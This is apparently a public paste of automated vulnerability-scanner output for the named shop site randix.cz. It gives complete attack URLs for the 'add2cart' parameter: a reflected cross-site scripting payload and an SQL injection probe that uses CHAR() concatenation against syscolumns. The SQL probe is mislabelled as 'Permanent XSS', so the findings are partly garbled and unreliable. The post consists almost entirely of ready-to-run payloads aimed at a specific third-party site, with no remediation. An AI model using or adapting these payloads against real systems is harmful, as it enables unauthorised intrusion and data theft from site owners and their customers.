sroub3k

randix.cz

Jul 20th, 2012
XSS (Cross-site Scripting)

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://www.randix.cz/index.php?shopping_cart=yes&add2cart=10'"--></style></script><script>alert(0x00014B)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: add2cart
Parameter Type: Querystring
Attack Pattern: 10'"--></style></script><script>alert(0x00014B)</script>

||| Permanent XSS (Cross-site Scripting)

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://www.randix.cz/index.php?shopping_cart=yes&add2cart='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Injection URL: http://www.randix.cz/index.php?shopping_cart=yes&add2cart=10%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014B)%3C%2Fscript%3E
Parameter Name: add2cart
Parameter Type: Querystring
Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'